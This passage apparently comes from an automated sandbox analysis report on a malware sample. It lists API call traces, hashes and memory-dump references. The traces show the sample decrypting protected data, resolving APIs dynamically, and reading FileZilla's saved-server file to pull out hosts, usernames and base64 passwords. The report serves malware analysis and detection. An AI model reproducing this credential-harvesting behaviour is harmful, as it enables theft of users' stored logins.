                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,00B253EB,40000001,00000000,00000000,?,00B253EB), ref: 00B39127
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: b221af2896fa5f7200e6f61984041ff5985cb7d46c535ca4488acfaa34af27ca
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 6B11EC74204605BFDB00CF94DC89FA733EAEF89754F209598F909AB250D7B5E842DBA0
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                        • LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID:
                                                        • API String ID: 4291131564-0
                                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction ID: c681dda3f515b9250e790341f7a69bcf7aacaf2e0bd8ebed254078c79965a030
                                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction Fuzzy Hash: 0011A4B4240208FFEB10CFA4DC95FAA77B5EB89704F208058FD199B394C776A901CB90
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                        • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                        • LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B29DEB
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B29E0A
                                                        • memcpy.MSVCRT(?,?,?), ref: 00B29E2D
                                                        • LocalFree.KERNEL32(?), ref: 00B29E3A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: c6aa5fe04d0ce49e13905ab4aeb9c488d8ffbf09fd3bfef5da70ab552c9985ea
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 0E11FAB8A00209EFDB04DFA4D985AAE77F5FF89300F104558E91997350D730AE10CF61
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                        • wsprintfA.USER32 ref: 00417AB7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 362916592-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                        APIs
                                                        • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID:
                                                        • API String ID: 123533781-0
                                                        • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                        • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: free
                                                        • String ID:
                                                        • API String ID: 1294909896-0
                                                        • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction ID: 9a3998a0e24f1c0077f2698e71d2faf349180f842f74fef1c46c5aaa869584de
                                                        • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction Fuzzy Hash: C371D4314D1B40DBD7633B31DD03E4A7AEA7F04302F314AB4B1DB28D369E2268659B52
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • strtok_s.MSVCRT ref: 0041031B
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                          • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                          • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                        • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                        • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                        • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                        • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                        • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                        • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                        • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                        • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                        • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                        • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                        • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                        • strtok_s.MSVCRT ref: 00410679
                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                        • memset.MSVCRT ref: 004106DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                        • API String ID: 337689325-514892060
                                                        • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                        • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                        APIs
                                                        • lstrlen.KERNEL32(00424DA0), ref: 00B24833
                                                        • lstrlen.KERNEL32(00424E50), ref: 00B2483E
                                                        • lstrlen.KERNEL32(00424F18), ref: 00B24849
                                                        • lstrlen.KERNEL32(00424FD0), ref: 00B24854
                                                        • lstrlen.KERNEL32(00425078), ref: 00B2485F
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B2486E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B24875
                                                        • lstrlen.KERNEL32(00425120), ref: 00B24883
                                                        • lstrlen.KERNEL32(004251C8), ref: 00B2488E
                                                        • lstrlen.KERNEL32(00425270), ref: 00B24899
                                                        • lstrlen.KERNEL32(00425318), ref: 00B248A4
                                                        • lstrlen.KERNEL32(004253C0), ref: 00B248AF
                                                        • lstrlen.KERNEL32(00425468), ref: 00B248C3
                                                        • lstrlen.KERNEL32(00425510), ref: 00B248CE
                                                        • lstrlen.KERNEL32(004255B8), ref: 00B248D9
                                                        • lstrlen.KERNEL32(00425660), ref: 00B248E4
                                                        • lstrlen.KERNEL32(00425708), ref: 00B248EF
                                                        • lstrlen.KERNEL32(004257B0), ref: 00B24918
                                                        • lstrlen.KERNEL32(00425858), ref: 00B24923
                                                        • lstrlen.KERNEL32(00425920), ref: 00B2492E
                                                        • lstrlen.KERNEL32(004259C8), ref: 00B24939
                                                        • lstrlen.KERNEL32(00425A70), ref: 00B24944
                                                        • strlen.MSVCRT ref: 00B24957
                                                        • lstrlen.KERNEL32(00425B18), ref: 00B2497F
                                                        • lstrlen.KERNEL32(00425BC0), ref: 00B2498A
                                                        • lstrlen.KERNEL32(00425C68), ref: 00B24995
                                                        • lstrlen.KERNEL32(00425D10), ref: 00B249A0
                                                        • lstrlen.KERNEL32(00425DB8), ref: 00B249AB
                                                        • lstrlen.KERNEL32(00425E60), ref: 00B249BB
                                                        • lstrlen.KERNEL32(00425F08), ref: 00B249C6
                                                        • lstrlen.KERNEL32(00425FB0), ref: 00B249D1
                                                        • lstrlen.KERNEL32(00426058), ref: 00B249DC
                                                        • lstrlen.KERNEL32(00426100), ref: 00B249E7
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B24A03
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID:
                                                        • API String ID: 2127927946-0
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: b6861695466288aec7f46d2f7e45e84b80412f1a0f0f77139afe7b0e0b410156
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 5C41A879740634EBC718AFE5FC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                        APIs
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B39C5D
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B39C75
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B39C8E
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B39CA6
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B39CBE
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B39CD7
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B39CEF
                                                        • LoadLibraryA.KERNEL32(0064A550,?,00B36C67), ref: 00B39D01
                                                        • LoadLibraryA.KERNEL32(0064A17C,?,00B36C67), ref: 00B39D12
                                                        • LoadLibraryA.KERNEL32(0064A104,?,00B36C67), ref: 00B39D24
                                                        • LoadLibraryA.KERNEL32(0064A1DC,?,00B36C67), ref: 00B39D36
                                                        • LoadLibraryA.KERNEL32(0064A328,?,00B36C67), ref: 00B39D47
                                                        • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B39D69
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B39D8A
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B39DA2
                                                        • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B39DC4
                                                        • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B39DE5
                                                        • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B39E06
                                                        • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B39E1D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 2238633743-0
                                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction ID: a87cb595ebfe859e8152a93ea2a2edd90f7f986e8383f0bfe95b546f4b10d869
                                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction Fuzzy Hash: 2DA13CBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • strtok_s.MSVCRT ref: 00B30582
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B305C9
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B305D0
                                                        • StrStrA.SHLWAPI(00000000,00421618), ref: 00B305EC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B305FA
                                                          • Part of subcall function 00B38B47: malloc.MSVCRT ref: 00B38B4F
                                                          • Part of subcall function 00B38B47: strncpy.MSVCRT ref: 00B38B6A
                                                        • StrStrA.SHLWAPI(00000000,00421620), ref: 00B30636
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30644
                                                        • StrStrA.SHLWAPI(00000000,00421628), ref: 00B30680
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B3068E
                                                        • StrStrA.SHLWAPI(00000000,00421630), ref: 00B306CA
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B306DC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30769
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30781
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30799
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B307B1
                                                        • lstrcat.KERNEL32(?,0042164C), ref: 00B307C9
                                                        • lstrcat.KERNEL32(?,00421660), ref: 00B307D8
                                                        • lstrcat.KERNEL32(?,00421670), ref: 00B307E7
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B307FA
                                                        • lstrcat.KERNEL32(?,00421678), ref: 00B30809
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3081C
                                                        • lstrcat.KERNEL32(?,0042167C), ref: 00B3082B
                                                        • lstrcat.KERNEL32(?,00421680), ref: 00B3083A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3084D
                                                        • lstrcat.KERNEL32(?,00421688), ref: 00B3085C
                                                        • lstrcat.KERNEL32(?,0042168C), ref: 00B3086B
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3087E
                                                        • lstrcat.KERNEL32(?,00421698), ref: 00B3088D
                                                        • lstrcat.KERNEL32(?,0042169C), ref: 00B3089C
                                                        • strtok_s.MSVCRT ref: 00B308E0
                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B308F5
                                                        • memset.MSVCRT ref: 00B30944
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID:
                                                        • API String ID: 3689735781-0
                                                        • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction ID: bc72e083eaf7eab4a73ae803530e7266f270aaa2d79bb4cf3ee9cc19cf7a6027
                                                        • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction Fuzzy Hash: 93D15076A40208ABCB04FBF4DD96EEEB7B9EF15701F604598F142B6091DF34AA05CB61
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
